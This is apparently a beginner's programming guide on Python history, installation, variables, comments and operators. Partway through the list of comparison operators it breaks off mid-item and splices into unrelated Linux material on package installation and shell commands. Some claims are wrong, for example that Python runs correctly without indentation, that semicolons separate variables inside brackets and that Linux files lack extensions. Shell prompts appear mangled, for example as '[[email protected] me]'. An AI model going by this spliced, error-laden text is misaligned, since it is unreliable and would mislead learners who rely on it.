very challenging. A tool, name of 2to3, was created to handle the parts of translation which could be automatically done. It carried out its tasks quite successfully, even though an early review stated that the tool was incapable of handling certain aspects of the conversion process. Proceeding the release of version 3.0, projects that required compatible with both the 2.x and 3.x series were advised to be given a singular base for the 2.x series. The 3.x series platform, on the other hand, was to produce releases via the 2to3 tool. For a long time, editing the Python 3.0 codes were forbidden because they required being run on the 2.x series. However, now, it is no longer necessary. The reason being that in 2012, the recommended method was to create a single code base which could run under the 2.x and 3.x series through compatibility modules. Between the December of 2008 and July 2019, 8 version updates have been published under the python 3.x series. The current version as at the 8th of July 2019 is the Python 3.7.4. Within this timeframe, many updates have been made to the programming language, involving the addition of new features mentioned below: 1. Print which used to be a statement was changed to an inbuilt function, making it relatively easier to swap out a module in utilizing different print functions as well as regularizing the syntax. In the late versions of the 2.x series, (python 2.6 and 2.7), print is introduced as inbuilt, but is concealed by a syntax of the print statement which is capable of being disabled by entering the following line of code into the top of the file: from__future__import print_function 2. The [input] function in the Python 2.x series was removed, and the [raw_input] function to [input] was

renamed. The change was such that the [input] function of Python 3 behaves similarly to the [raw_input] function of the python 2.x series; meaning input is typically outputted in the form of strings instead of being evaluated as a single expression. 3. [reduce] was removed with the exemption of [map] and [filter] from the in-built namespace into [functools]. The reason behind this change is that operations involving [reduce] are better expressed with the use of an accumulation loop. 4. Added support was provided for optional function annotations which could be used in informal type declarations as well as other purposes. 5. The [str]/[unicode] types were unified, texts represented, and immutable bytes type were introduced separately as well as a mutable [bytearray] type which was mostly corresponding; both of which indicate several arrays of bytes. 6. Taking out the backward-compatibility features such as implicit relative imports, old-style classes, and string exceptions. 7. Changing the mode of integer division functionality. For instance, in the Python 2.x series, 5/2 equals 2. Note that in the 3.x series, 5/2 equals 2.5. From the recent versions of the 2.x series beginning from version 2.2 up until python 3: 5//2 equals 2. In contemporary times, version releases in the version 3.x series have all been equipped with added, substantial new features; and every ongoing development on Python is being done in line with the 3.x series.

C. HOW TO DOWNLOAD AND INSTALL PYTHON In this time and age, being techy is a demand of the times, and the lack of knowledge, classifies one as an outback. This can result to being left out from the career world, especially in the field of programming. Numerous big shot companies have employed their own programmers for purposes of branding, and to cut back on IT expenses. In the world of programming, using Python language is found to be easier and programmer-friendly, thus, the universal use. Discussed below are information on how to download python for MS Windows. In this particular demo, we have chosen windows because it’s the most common worldwide – even in not so progressive countries. We want to cater to the programming needs of everyone all over the globe. Python 2.7.17 version was selected because this version bridges the gap between the old version 2 and the new version 3. Some of the updated functions/applications of version 3 are still not compatible with some devices, so 2.7.17 is a smart choice. Steps in downloading Python 2.7.17, and installing it on Windows 1. Type python on your browser and press the Search button to display the search results. Scroll down to find the item you are interested in. In this instance, you are looking for python. click “python releases for windows”, and a new page opens. See image below:

2. Select the Python version, python 2.7.17, and click, or you can select the version that is compatible to your device or OS.

3. The new page contains the various python types. Scroll down and select an option: in this instance, select Windows x86 MSI installer and click.

4. Press the Python box at the bottom of your screen. Click the “Run” button, and wait for the new window to appear. 5. Select the user options that you require and press “NEXT”. Your screen will display the hard drive where your python will be located.

6. Press the “NEXT” button. 7. Press yes, and wait for a few minutes. Sometimes it can take longer for the application to download, depending on the speed of your internet. 8. After that, click the FINISHED button to signify that the installation has been completed

Your python has been installed in your computer and is now ready to use. Find it in drive C, or wherever you have saved it. There can be glitches along the way, but there are options which are presented in this article. If you follow it well, there is no reason that you cannot perform this task. It’s important to note that there’s no need to compile programs. Python is an interpretive language and can execute quickly your commands. You can also download directly from the Python website, by selecting any of these versions – 3.8.1 or 2.7.17. and clicking ‘download.’

See image below:

Follow the step by step instructions prompted by the program itself. Save and run the program in your computer. For Mac To download Python on Mac, you can follow a similar procedure, but this time, you will have to access the “Python.mpkg” file, to run the installer.

For Linux For Linux, Python 2 and 3 may have been installed by default. Hence, check first your operating system. You can check if your device has already a Python program, by accessing your command prompt and entering this: python—version, or python3—version. If Python is not installed in your Linux, the result “command not found” will be displayed. You may want to download both Python 2.7.17 and any of the versions of Python 3 for your Linux. This is due to the fact that Linux can have more compatibility with Python 3. For windows users, now that you have downloaded the program, you’re ready to start. And yes, congratulations! You can now begin working and having fun with your Python programming system.

Writing The First Python Program Beginners may find it difficult to start using Python. It’s a given and nothing’s wrong about that. However, your desire to learn will make it easier for you to gradually become familiar with the language. Here are the specific steps you can follow to start using Python. Steps in using Python Step #1–Read all about Python. Python has included a README information in your downloaded version. It’s advisable to read it first, so you will learn more about the program. You can start using your Python through the command box (black box), or you can go to your saved file and read first the README file by clicking it. See image below:

This box will appear.

You can read the content completely, if you want to understand more what the program is all about, the file-setup, and similar information. This is a long data that informs you of how to navigate and use Python. Also, Python welcomes new contributions for its further development. You can copy paste the content of the box into a Window document for better presentation. If you don’t want to know all the other information about Python and you’re raring to go, you can follow these next steps. Step #2–Start using Python. First open the Python file you have saved in your computer. Click on Python as show below. In some versions, you just click ‘python’for the shell to appear.

See image below:

You can start using Python by utilizing the simplest function, which is ‘print’. It’ s the simplest statement or directive of python. It prints a line or string that you specify. For Python 2, print command may or may not be enclosed in parenthesis or brackets, while in Python 3 you have to enclose print with brackets. Example for Python 2: print “Welcome to My Corner.” Example for Python 3: print (“Welcome to My Corner”)

The image below shows what appears when you press ‘enter’.

You may opt to use a Python shell through idle. If you do, this is how it would appear:

In the Python 3.5.2 version, the text colors are: function (purple), string (green) and the result (blue). (The string is composed of the words inside the bracket (“Welcome to My Corner”), while the function is the command word outside the bracket (print). Take note that the image above is from the Python 2.7.12 version. You have to use indentation for your Python statements/codes. The standard Python code uses four spaces. The indentations are used in place of braces or blocks. In some programming languages, you usually use semi-colons at the end of the commands–in python, you don’t need to add semicolons at the end of the whole statement. In Python, semi-colons are used in separating variables inside the brackets.

For version 3, click on your downloaded Python program and save the file in your computer. Then Click on IDLE (Integrated DeveLopment Environment), your shell will appear. You can now start using your Python. It’s preferable to use idle, so that your codes can be interpreted directly by idle. Alternative method to open a shell (for some versions). An alternative method to use your Python is to open a shell through the following steps: Step #1– Open your menu. After downloading and saving your Python program in your computer, open your menu and find your saved Python file. You may find it in the downloaded files of your computer or in the files where you saved it. Step #2–Access your Python file. Open your saved Python file (Python 27) by double clicking it. The contents of Python 27 will appear. Instead of clicking on Python directly (as shown above), click on Lib instead.

See image below.

This will appear:

Step #3–Click on ‘idlelib’.

Clicking the ‘idlelib’ will show this content:

Step #4–Click on idle to show the Python shell. When you click on any of the ‘idle’ displayed on the menu, the ‘white’ shell will be displayed, as shown below:

The differences between the three ‘idle’ menu, is that the first two ‘idle’ commands have the black box (shell) too, while the last ‘idle’ has only the ‘white’ box (shell). I prefer the third ‘idle’ because it’ s easy to use. Step #5–Start using your Python shell.

You can now start typing Python functions, using the shell above. You may have noticed that there are various entries to the contents of each of the files that you have opened. You can click and open all of them, as you progress in learning more about your Python programming. Python is a programming language that has been studied by students for several days or months. Thus, what’ s presented in this book are the basics for beginners. The rest of illustrations will assume you are running the python programs in a Windows environment. 1. Start IDLE 2. Navigate to the File menu and click New Window 3. Type the following: print (“Hello World!”) 4. On the file, menu click Save. Type the name of myProgram1.py 5. Navigate to Run and click Run Module to run the program. The first program that we have written is known as the “Hello World!” and is used to not only provide an introduction to a new computer coding language but also test the basic configuration of the IDE. The output of the program is “Hello World!” Here is what has happened, the Print() is an inbuilt function, it is prewritten and preloaded for you, is used to display whatever is contained in the () as long as it is between the double quotes. The computer will display anything written within the double quotes. Practice Exercise: Now write and run the following python programs: ✓

print(“I am now a Python Language Coder!”)



print(“This is my second simple program!”)



print(“I love the simplicity of Python”)

✓ print(“I will display whatever is here in quotes such as owyhen2589gdbnz082”) Now we need to write a program with numbers but before writing such a program we need to learn something about Variables and Types. Remember python is object-oriented and it is not statically typed which means we do not need to declare variables before using them or specify their type. Let us explain this statement, an objectoriented language simply means that the language supports viewing and manipulating real-life scenarios as groups with subgroups that can be linked and shared mimicking the natural order and interaction of things. Not all programming languages are object oriented, for instance, Visual C programming language is not object-oriented. In programming, declaring variables means that we explicitly state the nature of the variable. The variable can be declared as an integer, long integer, short integer, floating integer, a string, or as a character including if it is accessible locally or globally. A variable is a storage location that changes values depending on conditions. For instance, number1 can take any number from 0 to infinity. However, if we specify explicitly that int number1 it then means that the storage location will only accept integers and not fractions for instance. Fortunately or unfortunately, python does not require us to explicitly state the nature of the storage location (declare variables) as that is left to the python language itself to figure out that. Before tackling types of variables and rules of writing variables, let us run a simple program to understand what variables when coding

a python program are. ✓

Start IDLE



Navigate to the File menu and click New Window



Type the following: num1=4 num2=5 sum=num1+num2 print(sum)

✓ On the file, menu click Save. Type the name of myProgram2.py ✓

Navigate to Run and click Run Module to run the program.

The expected output of this program should be “9” without the double quotes. Discussion At this point, you are eager to understand what has just happened and why the print(sum) does not have double quotes like the first programs we wrote. Here is the explanation. The first line num1=4 means that variable num1(our shortened way of writing number1, first number) has been assigned 4 before the program runs. The second line num2=5 means that variable num2(our shortened way of writing number2, second number) has been assigned 5 before the program runs. The computer interprets these instructions and stores the numbers given The third line sum=num1+num2 tells the computer that takes

whatever num1 has been given and add to whatever num2 has been given. In other terms, sum the values of num1 and num2. The fourth line print(sum) means that display whatever sum has. If we put double quotes to sum, the computer will simply display the word sum and not the sum of the two numbers! Remember that cliché that computers are garbage in and garbage out. They follow what you give them! Note: + is an operator for summing variables and has other uses. Now let us try out three exercises involving numbers before we explain types of variables and rules of writing variables so that you get more freedom to play with variables. Remember variables values vary for instance num1 can take 3, 8, 1562, 1. Follow the steps of opening Python IDE and do the following: ✓

The output should be 54

num1=43 num2=11 sum=num1+num2 print(sum) ✓ The output should be 167 num1=101 num2=66 sum=num1+num2 print(sum) ✓

The output should be 28

num1=9 num2=19

sum=num1+num2 print(sum) 1. Variables We have used num1, num2, and sum and the variable names were not just random, they must follow certain rules and conventions. Rules are what we cannot violate while conventions are much like the recommended way. Let us start with the rules: The Rules of When Naming Variables in Python 1. Variable names should always start with a letter or an underscore, i.e. num1 _num1 2. The remaining part of the variable name may consist of numbers, letters, and underscores, i.e. number1 num_be_r 3. Variable names are case sensitive meaning that capital letters and non-capital letters are treated differently. Num1 will be treated differently with num1.

Practice Exercise Write/suggest five variables for: ✓

Hospital department.



Bank.



Media House.

Given scri=75, scr4=9, sscr2=13, Scr=18 ✓ The variable names in above are supposed to represents scores of students. Rewrite the variables to satisfy Python variable rules and conventions. 2. Conventions When Naming Variables in Python As earlier indicated, conventions are not rules per se are the established traditions that add value and readability to the way we name variables in Python. ❖ Uphold readability. Your variables should give a hint of what they are handling because programs are meant to be read by other people other than the person writing them. number1 is easy to read compared to n1. Similarly, first_name is easy to read compared to firstname or firstName or fn. The implication of all these is that both are valid/acceptable variables in python but the convention is forcing us to write them in an easy to read form. ❖ Use descriptive names when writing your variables. For instance, number1 as a variable name is descriptive compared yale or mything. In other words, we can write yale to capture values for number1 but the name does not outrightly hint what we are doing. Remember when writing programs; assume another person will maintain them. The person should be able to quickly figure out what the program is all about before running it. ❖ Due to confusion, avoid using the uppercase ‘O’, lowercase letter ‘l’ and the uppercase letter ‘I’ because they can be confused with numbers. In other terms, using these letters will not be a violation of writing variables but their inclusion as variable names will breed confusion.

Practice Exercise 1 Re-write the following variable names to (1) be valid variable names and follow (2) conventions of writing variable names. ✓

23doctor

✓ ✓

line1 Option3



Mydesk



#cup3

Practice Exercise 2 Write/Suggest variable names that are (1) valid and (2) conventional. ✓

You want to sum three numbers.

✓ ✓

You want to store the names of four students. You want to store the names of five doctors in a hospital. 3. Keywords and Identifiers in Python Programming Language

At this point, you have been wondering why you must use print and str in that manner without the freedom or knowledge of why the stated words have to be written in that manner. The words print and str constitute a special type of words that have to be written that way always. Each programming language has its set of keywords. In most cases, some keywords are found across several programming languages. Keywords are case sensitive in python meaning that we have to type them in their lowercase form always. Keywords cannot be used to name a function (we will explain what it is later), name of a variable. There are 33 keywords in Python and all are in lowercase save for

None, False, and True. They must always be written as they appear below: Note: The print() and str are functions, but they are inbuilt/preloaded functions in Pythons. Functions are a set of rules and methods that act when invoked. For instance, the print function will display output when activated/invoked/called. At this point, you have not encountered all of the keywords, but you will meet them gradually. Take time to skim through, read and try to recall as many as you can. Practice Exercise Identify what is wrong with the following variable names (The exercise requires recalling what we have learned so far) ✓ for=1 ✓

yield=3



34ball



m

4. Comments and Statements Statements in Python A statement in Python refers to instructions that a Python interpreter can work on/execute. An example is str=’I am a Programmer’ and number1=3. A statement having an equal sign(=)

is known as an assignment statement. They are other types of statements such as the if, while, and for which will be handled later. Practice Exercise ✓ Write a Python statement that assigns the first number a value of 18. ✓ Write a programming statement that assigns the second number value of 21. ✓ What type of statements are a. and b. above? 5. Multi-Line Python Statement It is possible to spread a statement over multiple lines. Such a statement is known as a multi-line statement. The termination of a programming statement is denoted by new line character. To spread a statement overs several lines, in Python, we use the backslash (\) known as the line continuation character. An example of a multi-line statement is: sum=3+6+7+\ 9+1+3+\ 11+4+8 The example above is also known as an explicit line continuation. In Python, the square brackets [] denotes line continuation similar to parenthesis/round brackets (), and lastly braces {}. The above example can be rewritten as sum=(3+6+7+ 9+1+3+ 11+4+8)

Note: We have dropped the backslash(\) known as the line continuation character when we use the parenthesis(round brackets) because the parenthesis is doing the work that the line continuation \ was doing. Question: Why do you think multi-line statements are necessary we can simply write a single line and the program statement will run just fine? Answer: Multi-line statements can help improve formatting/readability of the entire program. Remember, when writing a program always assume that it is other people who will use and maintain it without your input. Practice Exercise: Rewrite the following program statements using multi-line operators such as the \, [],() or {} to improve readability of the program statements. total=2+9+3+6+8+2+5+1+14+5+21+26+4+7+13+31+24 count=13+1+56+3+7+9+5+12+54+4+7+45+71+4+8+5 Semicolons are also used when creating multiple statements in a single line. Assume we have to assign and display the age of four employees in a python program. The program could be written as: employee1=25; employee2=45; employee3=32; employee4=43.

6. Indentation in Python Indentation is used for categorization program lines into a block in Python. The amount of indentation to use in Python depends

entirely on the programmer. However, it is important to ensure consistency. By convention, four whitespaces are used for indentation instead of using tabs. For example: Note: We will explain what kind of program of this is later. Indentation in Python also helps make the program look neat and clean. Indentation creates consistency. However, when performing line continuation indentation can be ignored. Incorrect indentation will create an indentation error. Correct python programs without indentation will still run but they might be neat and consistent from human readability view. 7. Comments in Pythons When writing python programs and indeed any programming language, comments are very important. Comments are used to describe what is happening within a program. It becomes easier for another person taking a look at a program to have an idea of what the program does by reading the comments in it. Comments are also useful to a programmer as one can forget the critical details of a program written. The hash (#) symbol is used before writing a comment in Python. The comment extends up to the newline character. The python interpreter normally ignores comments. Comments are meant for programmers to understand the program better. Example Start IDLE Navigate to the File menu and click New Window Type the following: #This is my first comment #The program will print Hello World

Print(‘Hello World’) #This is an inbuilt function to display On the file, menu click Save. Type the name of myProgram5.py Navigate to Run and click Run Module to run the program Practice Exercise This exercise integrates most of what we have covered so far. ✓ Write a program to sum two numbers 45, and 12 and include single line comments at each line of code. ✓ Write a program to show the names of two employees where the first employee is “Daisy” and the second employee is “Richard”. Include single comments at each line of code. ✓ Write a program to display the student registration numbers where the student names and their registration are: Yvonne=235, Ian=782, James=1235, Juliet=568. Multi-Line Comments Just like multi-line program statements we also have multi-line comments. There are several ways of writing multi-line comments. The first approach is to type the hash (#) at each comment line starting point. For Example Start IDLE. Navigate to the File menu and click New Window. Type the following: #I am going to write a long comment line

#the comment will spill over to this line #and finally end here. The second way of writing multi-line comments involves using triple single or double quotes: ‘’’ or”””. For multi-line strings and multi-line comments in Python, we use the triple quotes. Caution: When used in docstrings they will generate extra code but we do not have to worry about this at this instance. Example: Start IDLE. Navigate to the File menu and click New Window. Type the following: “””This is also a great i illustration of a multi-line comment in Python””” Summary Variable are storage locations that a user specifies before writing and running a python program. Variable names are labels of those storage locations. A variable holds a value depending on circumstances. For instance, doctor1 can be Daniel, Brenda or Rita. Patient1 can be Luke, William or Kelly. Variable names are written by adhering to rules and conventions. Rules are a must while conventions are optional but recommended as they help write readable variable names. When writing a program, you should assume that another person will examine or run it without your input and thus should be well written. In programming, declaring variables means that we explicitly state the nature of the variable. The variable can be declared as an integer, long integer, short integer, floating integer, a string, or as a character including if it is

accessible locally or globally. A variable is a storage location that changes values depending on conditions. Use descriptive names when writing your variables.

The Python Operators

While we are here, we want to look at the topic of the Python operators and what these are able to do for some of our codings. As we go through some of the codings that need to be done as a beginner throughout this guidebook, you will find that these operators are pretty common and we are going to use them on a regular basis. There are actually a number of operators, but we are able to split them up into a few different types based on our needs. Some of the different operators that we are able to work with will include: 1. The arithmetic operators. These are the ones that will allow you to complete some mathematical equations inside of your code, such as addition or subtraction. You can simply add together two operands in the code, or two parts of the code together, subtract them, multiply them, and divide them and work from there.

These can be used in many of the different codes that you would want to write along the way. Some of the options that you will be able to use when it comes to the arithmetic operators will include: 1. (+): this is the addition operator and it is responsible for adding together both of your values. 2. (-): this is the subtraction operator and it is going to be responsible for taking the right operand and subtracting it from the left. 3. (*): this is the multiplication operator and it is used to multiply two or more values in the equation. 4. (/): this is the division operator and it is going to divide the value of the left operand from that on the right and gives you the answer. 2. Comparison operators: We are also able to work with the comparison operators. These are going to be a good option when we would like to take two or more parts of the code, such as the statements or the values, and then compare them with one another. This one is going to rely on the Boolean expressions to help us get things done because it will allow us to look at true or false answers along the way. so, the statements that you are comparing will either be true or they will be false based on how they compare. 1. (>=): this one means to check if the operand on the left is greater than or equal to the value of the one on the right.

2. (): this one means to check whether the values of the left side are greater than the value on the right side of the code. 4. ( Administration -> Synaptic Package Manager When you get to this point, you need to search for the package that you require. In this example, the package shall be called comp. Next, you should install the package using a command line as follows: sudo apt-get install comp Linux also has another advantage over some popular operating systems. This include the ability to install more than one package at a time, without having to complete a process or more between windows. It all comes down to what information is entered in the command lines. An example of this is as follows: sudo apt-get install comp beta-browser There are even more advantages (other than convenience) to being able to install multiple packages. In Linux, these advantages include updating. Rather than updating each application, one at a time, Linux allows for all the applications to be updated simultaneously through the update manager. The Linux repository is diverse, and a proper search through it will help you to identify a large variety of apps that you will find useful. Should there be an application that you need which is not available in the repository, Linux will

give you instructions on how you can add separate repositories. The Command Line Using Linux allows you to customize your system to fit your needs. For those who are not tech savvy, the distributions settings are a good place to change things until you get what you want. However, you could spend hours fiddling with the available settings and still fail to find setting that is perfect for you. Luckily, Linux has a solution and that comes in the form of the command line. Even though the command line sounds complex, like something that can only be understood by a tech genius, it is quite simple to discern. The beauty of adjusting things in your operating system using the command line, so that the sky is the limit and creativity can abound. To begin, you need to use “The Shell”. This is basically a program which can take in commands from your keyboard and ensure that the operating systems performs these commands. You will also need to start a “Terminal”. A terminal is also a program and it allows you to interact with the shell. To be a terminal, you should select the terminal option from the menu. In this way, you can gain access to a shell session. In this way you can begin practicing your command prompts. In your shell session, you should see a shell prompt. Within this shell prompt you will be see your username and the name of the machine that you are using, followed by a dollar sign. It will appear as follows: [[email protected] me] $ If you try to type something under this shell prompt, you will see a message from bash. For example, [[email protected] me] $ lmnopqrst bash: lmnopqrst command not found This is an error message where the system lets you know that it is unable to comprehend the information you put in. If you press the up-arrow key, you will find that you can go back to your previous command, the lmnopqrst one. If you press the down arrow key, you will find yourself on a blank line.

This is important to note because you can then see how you end up with a command history. A command history will make it easier for you to retrace your steps and make corrections as you learn how to use the command prompt. Command Lines for System Information The most basic and perhaps most useful command lines are those that will help you with system information. To start, you can try the following: Command for Date This is a command that will help you to display the date. [email protected]: -# date Thursday May 21 12.31.29 IST 2o15 Command for Calendar This command will help display the calendar of the current month, or any other month that may be coming up. [email protected]: -# cal Command for uname This command is for Unix Name, and it will provide detailed information about the name of the machine, its operating system and the Kernel. Navigating Linux Using Command Lines You can use the command lines in the same way that you would use a mouse, to easily navigate through your Linux operating system so that you can complete the tasks you require. In this section, you will be introduced to the most commonly used commands. Finding files in Linux is simple, as just as they are arranged in order in familiar Windows programmes, they also follow a hierarchical directory structure. This structure resembles what you would find with a list of folders and is referred to as directories. The primary directory within a file system is referred to as a root directory. In it, you will be able to source files, and subdirectories which could contain additional sorted files. All files are stored under a single tree, even if there are several storage devices. pwd

pwd stands for print working directory. These will help you to choose a directory where you can store all your files. Command lines do not give any graphical representation of a filing structure. However, when using a command line interface, you can view all the files within a parent directory, and all the pathways that may exist in a subdirectory. This is where the pwd comes in. Anytime that you are simply standing in a directory, you are in a working directory. The moment you log onto your Linux operating system, you will arrive in your home directory (which will be your working directory while you are in it). In this directory, you can find all your files. To identify the name of the directory that you are in, you should use the following pwd command. [[email protected] me] $pwd /home/me You can then begin exploring within the directory by using the ls command. ls stands for list files in the directory. Therefore, to view all the files that are in your working directory, type in the following command and you will see results as illustrated below. [[email protected] me] $ls Desktop GNUstep

bin ndeit.rpm

linuxcmd nsmail

cd cd stands for change directory. This is the command that you need to use when you want to switch from your working directory and view other files. To use this command, yu need to know the pathname for the working directory that you want to view. There are two different types of pathnames for you to discern. There is the absolute pathname and the relative pathname. The absolute pathname is one that starts at your root directory, and by following a file path, it will easily lead you to your desired directory. Suppose your absolute pathname for a directory is /usr/bin. The directory is known as usr and there is another directory within it using the name bin. If you want to use the cd command to access your absolute pathname, you should type in the following command: [[email protected] me] $cd/user/bin

[[email protected] me] $pwd /usr/bin [[email protected] me] $ls When you enter this information, you would have succeeded in changing your working directory to /usr/bin. You can use a relative pathname when you want to change the new working directory which is /usr/bin to the parent directory, which would be /usr. To execute this, you should type in the following prompt: [[email protected] me] $cd .. [[email protected] me] $pwd /usr Using a relative pathway cuts down on the amount of typing that you must do when using command lines, therefore, it is recommended that you learn as many of these as possible. When you want to access a file using Linux command prompts, you should take note that they are case sensitive. Unlike other files which you would find on Windows Operating Systems and programs, the files in Linux do not have file extensions. This is great because it gives you the flexibility of labeling the files anything that you like. One thing you need to be careful of are the application programs that you use. There are some that may automatically create extensions on files, and it is these that you need to be careful and watch out for.

Chapter 7 Introduction to Linux Shell

Effective Linux professional is unthinkable without using the command line. The command line is a shell prompt that indicates the system is ready to accept a user command. This can be called a user dialogue with the system. For each command entered, the user receives a response from the system: 1. another invitation, indicating that the command is executed and you can enter the next. 2. error message, which is a statement of the system about events in it, addressed to the user. Users who are accustomed to working in systems with a graphical interface, working with the command line may seem inconvenient. However, in Linux, this type of interface has always been basic, and therefore well developed. In the command shells used in Linux, there are plenty of ways to save effort, that is, keystrokes when performing the most common actions: automatic addition of long command names or file names searching and re-executing a command that was once performed before substitution of file name lists by some pattern, and much more The advantages of the command line are especially obvious when you need to perform similar operations on a variety of objects. In a system with a graphical interface, you need as many mice dragging as there are objects, one

command will be enough on the command line. This section will describe the main tools that allow you to solve any user tasks using the command line: from trivial operations with files and directories, for example, copying, renaming, searching, to complex tasks requiring massive similar operations that occur as in the user's application work, when working with large data arrays or text, and in system administration. Shells A command shell or command interpreter is a program whose task is to transfer your commands to the operating system and application programs, and their answers to you. According to its tasks, it corresponds to command.com in MS-DOS or cmd.exe in Windows, but functionally the shell in Linux is incomparably richer. In the command shell language, you can write small programs to perform a series of sequential operations with files and the data they contain — scripts. Having registered in the system by entering a username and password, you will see a command line prompt – a line ending in $. Later this symbol will be used to denote the command line. If during the installation a graphical user interface was configured to start at system boot, then you can get to the command line on any virtual text console. You need to press Ctrl-Alt-F1 Ctrl-Alt-F6 or using any terminal emulation program, for example, xterm. The following shells are available. They may differ depending on the distributor: bash The most common shell for Linux. It can complement the names of commands and files, keeps a history of commands and provides the ability to edit them. pdkdh The korn shell clone, well known on UNIX shell systems. sash The peculiarity of this shell is that it does not depend on any shared libraries

and includes simplified implementations of some of the most important utilities, such as al, dd, and gzip. Therefore, the sash is especially useful when recovering from system crashes or when upgrading the version of the most important shared libraries. tcsh Improved version of C shell. zsh The newest of the shells listed here. It implements advanced features for autocompletion of command arguments and many other functions that make working with the shell even more convenient and efficient. However, note that all zsh extensions are disabled by default, so before you start using this command shell, you need to read its documentation and enable the features that you need. The default shell is bash Bourne Again Shell. To check which shell you're using, type the command: echo $ SHELL. Shells differ from each other, not only in capabilities but also in command syntax. If you are a novice user, we recommend that you use bash, further examples describe the work in this particular area. Bash shell The command line in bash is composed of the name of the command, followed by keys (options), instructions that modify the behavior of the command. Keys begin with the character – or –, and often consist of a single letter. In addition to keys, after the command, arguments (parameters) can follow – the names of the objects on which the command must be executed (often the names of files and directories). Entering a command is completed by pressing the Enter key, after which the command is transferred to the shell for execution. As a result of the command execution on the user’s terminal, there may appear messages about the command execution or errors, and the appearance of the next command line prompt (ending with the $ character) indicates that the command has completed and you can enter the next one. There are several techniques in bash that make it easier to type and edit the command line. For example, using the keyboard, you can:

Ctrl-A go to the beginning of the line. The same can be done by pressing the Home key; Ctrl-u delete current line; Ctrl-C Abort the execution of the current command. You can use the symbol; in order to enter several commands in one line. bash records the history of all commands executed, so it’s easy to repeat or edit one of the previous commands. To do this, simply select the desired command from the history: the up key displays the previous command, the down one and the next one. In order to find a specific command among those already executed, without flipping through the whole story, type Ctrl-R and enter some keyword used in the command you are looking for. Commands that appear in history are numbered. To run a specific command, type: ! command number If you enter !!, the last command typed starts. Sometimes on Linux, the names of programs and commands are too long. Fortunately, bash itself can complete the names. By pressing the Tab key, you can complete the name of a command, program, or directory. For example, suppose you want to use the bunzip2 decompression program. To do this, type: bu Then press Tab. If nothing happens, then there are several possible options for completing the command. Pressing the Tab key again will give you a list of names starting with bu. For example, the system has buildhash, builtin, bunzip2 programs: $ bu buildhash builtin bunzip2

$ bu Type n> (bunzip is the only name whose third letter is n), and then press Tab. The shell will complete the name and it remains only to press Enter to run the command! Note that the program invoked from the command line is searched by bash in directories defined in the PATH system variable. By default, this directory listing does not include the current directory, indicated by ./ (dot slash). Therefore, to run the prog program from the current directory, you must issue the command ./prog. Basic commands The first tasks that have to be solved in any system are: working with data (usually stored in files) and managing programs (processes) running on the system. Below are the commands that allow you to perform the most important operations on working with files and processes. Only the first of these, cd, is part of the actual shell, the rest are distributed separately, but are always available on any Linux system. All the commands below can be run both in the text console and in graphical mode (xterm, KDE console). For more information on each command, use the man command, for example: man ls cd Allows you to change the current directory (navigate through the file system). It works with both absolute and relative paths. Suppose you are in your home directory and want to go to its tmp / subdirectory. To do this, enter the relative path: cd tmp / To change to the / usr / bin directory, type (absolute path): cd / usr / bin / Some options for using the command are: cd .. Allows you to make the current parent directory (note the space between cd and ..).

cd Allows you to return to the previous directory. The cd command with no parameters returns the shell to the home directory. ls ls (list) lists the files in the current directory. Two main options: -a - view all files, including hidden, -l - display more detailed information. rm This command is used to delete files. Warning: deleting the file, you cannot restore it! Syntax: rm filename. This program has several parameters. The most frequently used ones are: -i file deletion request, -r - recursive deletion (i.e. deletion, including subdirectories and hidden files). Example: rm -i ~ / html / *. html Removes all .html files in your html directory. mkdir, rmdir The mkdir command allows you to create a directory, while rmdir deletes a directory, provided it is empty. Syntax: mkdir dir_name rmdir dir_name The rmdir command is often replaced by the rm -rf command, which allows you to delete directories, even if they are not empty. less less allows you to page by page. Syntax: less filename It is useful to review a file before editing it; The main use of this command is the final link in a chain of programs that outputs a significant amount of text that does not fit on one screen and otherwise flashes too quickly. To exit less, press q (quit). grep

This command allows you to find a string of characters in the file. Please note that grep searches by a regular expression, that is, it provides the ability to specify a template for searching a whole class of words at once. In the language of regular expressions, it is possible to make patterns describing, for example, the following classes of strings: “four digits in a row, surrounded by spaces”. Obviously, such an expression can be used to search in the text of all the years written in numbers. The search capabilities for regular expressions are very wide. For more information, you can refer to the on-screen documentation on grep (man grep). Syntax: grep search_file ps Displays a list of current processes. The command column indicates the process name, the PID (process identifier) is the process number (used for operations with the process — for example, sending signals with the kill command). Syntax: ps arguments Argument u gives you more information, ax allows you to view those processes that do not belong to you. kill If the program stops responding or hangs, use this command to complete it. Syntax: kill PID_number The PID_number here is the process identification number, You can find out the process number for each executable program using the ps command. Normally, the kill command sends a normal completion signal to the process, but sometimes it does not work, and you will need to use kill -9 PID_number. In this case, the command will be immediately terminated by the system without the possibility of saving data (abnormal). The list of signals that the kill command can send to a process can be obtained by issuing the command kill -l.

File and Directory Operations Here we consider utilities that work with file system objects: files, directories, devices, as well as file systems in general. cp Copies files and directories. mv Moves (renames) files. rm Removes files and directories. df Displays a report on the use of disk space (free space on all disks). du Calculates disk space occupied by files or directories. ln Creates links to files. ls Lists files in a directory, supports several different output formats. mkdir Creates directories. touch Changes file timestamps (last modified, last accessed), can be used to create empty files. realpath Calculates absolute file name by relative. basename Removes the path from the full file name (i.e., shortens the absolute file name to relative). dirname

Removes the file name from the full file name (that is, it displays the full name of the directory where the file is located). pwd Displays the name of the current directory. Filters Filters are programs that read data from standard input, convert it and output it to standard output. Using filtering software allows you to organize a pipeline: to perform several sequential operations on data in a single command. More information about standard I / O redirection and the pipeline can be found in the documentation for bash or another command shell. Many of the commands listed in this section can work with files. cat combines files and displays them to standard output; tac combines files and displays them on standard output, starting from the end; sort sorts rows; uniq removes duplicate lines from sorted files; tr performs the replacement of certain characters in the standard input for other specific characters in the standard output, can be used for transliteration, deletion of extra characters and for more complex substitutions; cut systematized data in text format can be processed using the cut utility, which displays the specified part of each line of the file; cut allows you to display only the specified fields (data from some columns of the table in which the contents of the cells are separated by a standard character — a tabulation character or any other), as well as characters standing in a certain place in a line;

paste combines data from several files into one table, in which the data from each source file make up a separate column; csplit divides the file into parts according to the template; expand converts tabs to spaces; unexpand converts spaces to tabs; fmt formats the text in width; fold transfers too long text lines to the next line; nl numbers file lines; od displays the file in octal, hexadecimal and other similar forms; tee duplicates the standard output of the program in a file on disk; Other commands head displays the initial part of the file of the specified size; tail outputs the final part of a file of a given size, since it can output data as it is added to the end of the file, used to track log files, etc.; echo displays the text of the argument on the standard output;

